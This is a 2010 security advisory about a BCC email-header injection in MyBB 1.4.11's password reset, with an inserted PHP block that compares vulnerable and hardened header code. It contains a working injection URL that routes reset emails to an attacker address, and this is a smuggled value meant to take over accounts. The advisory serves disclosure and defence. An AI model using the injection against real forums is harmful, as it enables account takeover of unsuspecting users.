MyBB 1.4.11 Password Reset

MyBB 1.4.11 Password Reset
Posted Apr 14, 2010
Authored by Stefan Esser

MyBB versions 1.4.11 and below suffer from a password reset vulnerability.

tags | advisory
SHA-256 | eebecf174ba3f29f1d553d050fbff4e47f7d1b2b733b9981a342465b41506447

SektionEins GmbH
www.sektioneins.de

-= Security Advisory =-

Advisory: MyBB Password Reset Email BCC: Injection Vulnerability
Release Date: 2010/04/13
Last Modified: 2010/04/13
Author: Stefan Esser [stefan.esser[at]sektioneins.de]

Application: MyBB <= 1.4.11
Severity: An email injection vulnerability in MyBB allows injecting
e.g. BCC mail headers into password reset emails. This
allows an attacker to take over accounts via the password
reset functionality.
Risk: Critical
Vendor Status: MyBB 1.4.12 was released, which fixes this vulnerability
Reference:
http://www.sektioneins.com/en/advisories/advisory-012010-mybb-password-reset-email-bcc-injection-vulnerability/


Overview:

Quote from http://www.mybboard.net
"MyBB is a discussion board that has been around for a while; it has
evolved from other bulletin boards into the forum package it is
today. Therefore, it is a professional and efficient discussion
board, developed by an active team of developers. The MyBB history
has been recorded and is available for the interested to read.
You can also read more about the MyBB team and why they develop
MyBB in their spare time. We also like to highlight the most
active and contributing fansites of the MyBB community."

During evaluation of various password reset implementations it was
discovered that MyBB contains an email injection vulnerability that
allows arbitrary account takeover by injecting BCC: email headers
through a simple URL manipulation.

When the password reset functionality is triggered via such a
manipulated URL, MyBB will send a copy of the secret password reset
email to wherever the injected BCC: header points to.

Details:

Inside the set_common_header() method of the MailHandler class the
following code is responsible for adding several common headers to
all outgoing emails. This includes all password reset emails.

$this->headers .= "Message-ID: <{$msg_id}>{$this->delimiter}";
$this->headers .= "Content-Transfer-Encoding: 8bit{$this->delimiter}";
$this->headers .= "X-Priority: 3{$this->delimiter}";
$this->headers .= "X-MSMail-Priority: Normal{$this->delimiter}";
$this->headers .= "X-Mailer: MyBB{$this->delimiter}";
if(defined("IN_ADMINCP"))
{
...
}
$this->headers .= "X-MyBB-Script: {$http_host}{$_SERVER['PHP_SELF']}{$this->delimiter}";
$this->headers .= "MIME-Version: 1.0{$this->delimiter}";

The code above adds a "X-MyBB-Script" header to all outgoing emails,
which contains the content of the $_SERVER['PHP_SELF'] variable.
The problem here is that PHP_SELF does not only contain the path
relative to the document root directory, but also extensions like
the Apache PATH_INFO. Therefore it is controllable by malicious
users.

By calling a MyBB PHP script like

http://example.com/MyBB/index.php/%0aBCC:attacker@example.com%0ax:

it is possible to add arbitrary BCC headers to all emails sent by
this script. If the same attack is used against the password reset
functionality an attacker is able to grab a copy of the secret
password reset token and the randomly generated password, which
results in an account takeover.

This vulnerability was fixed by the vendor by removing the code that
adds the X-MyBB-Script header to the email.

Furthermore it should be noted that users of the Suhosin Extension
version 0.9.30 or newer are safe from this class of attacks because
several unsafe characters like < > " ' \r and \n are automatically
replaced by a ? character within PHP_SELF.
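The following is an added illustration, not MyBB's or SektionEins' code: it rebuilds the X-MyBB-Script header in the concatenating form the advisory describes and next to it a hardened builder that refuses CR/LF in any header value and takes its path from SCRIPT_NAME (which, unlike PHP_SELF, excludes PATH_INFO). The sample PHP_SELF value is constructed from the advisory's URL; the function names are assumptions.

```php
<?php
// Added example (not MyBB code): building the X-MyBB-Script header
// from a request-derived value, in the vulnerable form the advisory
// describes and in a hardened form that rejects CR/LF in header values.

// Constructed sample: PHP_SELF for a request to /MyBB/index.php carrying
// the PATH_INFO suffix from the advisory's URL, already URL-decoded by
// the web server ("%0a" has become "\n").
$sample_php_self = "/MyBB/index.php/\nBCC:attacker@example.com\nx:";
$http_host = "example.com";
$delimiter = "\r\n";

// Vulnerable pattern (MyBB <= 1.4.11): the value is concatenated into the
// header block unchanged, so embedded line breaks start new header lines.
function build_script_header_vulnerable($http_host, $php_self, $delimiter)
{
    return "X-MyBB-Script: {$http_host}{$php_self}{$delimiter}";
}

// Hardened variant: a header value may never contain CR or LF. Throwing is
// preferable to silently stripping, because the exception surfaces the
// tampering attempt in the application's error log.
function safe_header_value($value)
{
    if (preg_match('/[\r\n]/', $value)) {
        throw new InvalidArgumentException("CR/LF in mail header value");
    }
    return $value;
}

function build_script_header_hardened($http_host, $script_name, $delimiter)
{
    return "X-MyBB-Script: " . safe_header_value($http_host . $script_name) . $delimiter;
}

// Self-check: the vulnerable builder yields a header block containing a
// line that begins with "BCC:"; the hardened builder refuses the same input.
$vuln = build_script_header_vulnerable($http_host, $sample_php_self, $delimiter);
echo preg_match('/^BCC:/m', $vuln) === 1
    ? "vulnerable builder: injected BCC: line present\n"
    : "vulnerable builder: no injection (unexpected)\n";

try {
    build_script_header_hardened($http_host, $sample_php_self, $delimiter);
    echo "hardened builder: accepted CR/LF (unexpected)\n";
} catch (InvalidArgumentException $e) {
    echo "hardened builder: rejected input (" . $e->getMessage() . ")\n";
}
// With the real SCRIPT_NAME ("/MyBB/index.php") the hardened builder succeeds.
echo build_script_header_hardened($http_host, "/MyBB/index.php", $delimiter);
```

The same CR/LF check belongs on every value that ends up in a mail header (From, Subject, recipient lists), not only on this one; the vendor's fix of dropping the header altogether removes the attacker-controlled value entirely, which is the simplest option when the header is not needed.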

Proof of Concept:

SektionEins GmbH is not going to release a proof of concept
exploit for this vulnerability.

Disclosure Timeline:

31. March 2010 - Notified the MyBB devs via security contact form
13. April 2010 - MyBB developers released MyBB 1.4.12
13. April 2010 - Public Disclosure

Recommendation:

It is recommended to upgrade to the latest version of MyBB.

Grab your copy at:
http://mybboard.net/downloads

CVE Information:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
not assigned a name to this vulnerability.

Month of PHP Security:

If you have a non-public vulnerability like this one, then don't
hesitate to submit it to the Month of PHP Security. Further
information at

http://php-security.org

GPG-Key:

pub 1024D/15ABDA78 2004-10-17 Stefan Esser
Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C 57DD 4AE1 795E 15AB DA78

Copyright 2010 SektionEins GmbH. All rights reserved.